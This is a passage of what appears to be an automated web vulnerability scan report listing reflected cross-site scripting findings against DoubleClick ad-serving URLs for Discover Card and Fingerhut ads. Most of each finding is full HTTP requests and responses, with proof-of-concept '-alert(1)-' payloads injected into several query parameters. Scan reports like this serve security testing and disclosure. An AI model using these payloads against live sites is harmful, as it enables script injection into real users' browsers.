
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4297
Date: Tue, 28 Jun 2011 02:16:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
f = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.JPG';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6'
...[SNIP]...

1.78. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57a'-alert(1)-'cfb43500a9c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:18:40 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x25
...[SNIP]...

1.79. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c50ad'-alert(1)-'a22d8d8e435 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:19:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x250.swf';
var d
...[SNIP]...

1.80. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a71'-alert(1)-'e380434b323 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:17:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://
...[SNIP]...

1.81. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290e8'-alert(1)-'d38eb4805ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805ab HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4205
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:19:18 GMT
Expires: Tue, 28 Jun 2011 02:19:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805abhttps://www.discovercard.com/cardmembersvcs/acqs/app/display?pageFileId=more15&sc=KBC6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.swf';
var
...[SNIP]...

1.82. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db2'-alert(1)-'3a61e2f6500 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:15:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ext = '';
var dcgif = 'http://s0.2mdn.net/1796512/CB300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var targ
...[SNIP]...

1.83. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3037d'-alert(1)-'8e6906997c7 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
6/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%
...[SNIP]...

